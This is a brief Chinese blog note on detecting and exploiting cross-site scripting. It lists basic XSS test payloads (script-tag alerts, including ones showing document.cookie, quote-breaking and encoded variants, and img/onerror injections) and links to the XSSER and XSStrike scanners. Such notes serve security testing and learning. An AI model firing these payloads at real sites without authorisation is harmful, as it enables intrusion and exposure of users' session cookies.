章节7：XSS检测和利用

程序员小勇2023-08-13 23:20

章节7：XSS检测和利用

测试payload

<script>alert('XSS')</script>

<script>alert(document.cookie)</script>

><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<img src="javascript:alert('XSS')">

onerror= "alert('XSS')">

https://blog.csdn.net/weixin_34038652/article/details/90221170

XSSER

https://xsser.03c8.net/

https://www.freebuf.com/sectool/173228.html

https://blog.csdn.net/gao646467783/article/details/113249158

XSSSTRIKE

https://github.com/s0md3v/XSStrike

python 3.6 以上

上一篇：R语言5_安装Giotto

下一篇：【MySQL】内置函数

热门推荐

01本地部署DeepSeek教程（Mac版本）02如何在WPS和Word/Excel中直接使用DeepSeek功能 03DeepSeek本地部署详细指南 04DeepSeek各版本说明与优缺点分析 05本地化部署AI知识库：基于Ollama+DeepSeek+AnythingLLM保姆级教程 06DeepSeek r1本地安装全指南 07太炸裂了！清华大学deepseek从入门到精通使用手册又出第三版了，《普通人如何抓住DeepSeek红利》（无套路，直接下载）08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具 09在Windows下安装Ollama并体验DeepSeek r1大模型 10Page Assist - 本地Deepseek模型 Web UI 的安装和使用